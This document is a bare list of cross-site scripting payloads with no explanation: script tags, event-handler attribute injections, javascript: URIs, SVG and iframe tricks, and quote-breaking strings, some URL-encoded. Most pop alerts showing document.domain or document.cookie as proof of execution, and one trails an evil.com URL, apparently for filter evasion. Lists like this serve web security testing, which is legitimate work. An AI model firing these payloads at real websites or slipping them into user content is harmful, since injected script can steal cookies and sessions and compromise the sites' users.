abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
%3Csvg%20onpointerenter=z=alert,z(document.domain)%3E
javascript:prompt(document.cookie)//
#data:text/plain,alert()
javascript:alert(document.domain);//https://evil.com/
');javascript:alert('DDD
#'onerror='alert()'
// scheame href="javascript:alert(document.domain)"
javascript:alert(document.domain)
href="javascript:alert(document.domain)"
<a href="javascript:alert(document.domain)">javascript:alert(document.domain)</a>
" onfocus=alert(document.domain)
"onclick=alert(document.domain);"
" onfocus="alert(document.domain)" autofocus="
" onfocus="alert(document.domain)"
<script>alert(document.domain)</script>
/?xss=500); alert(document.cookie);
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
/><svg src=x onload=confirm(document.domain);>
"><img src=x onerror=alert(document.domain)>
55577%5D%22)%3balert(document.cookie)%3b//